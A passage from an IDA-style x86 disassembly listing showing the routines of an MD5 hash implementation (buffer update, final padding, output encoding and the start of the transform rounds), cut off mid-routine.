mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
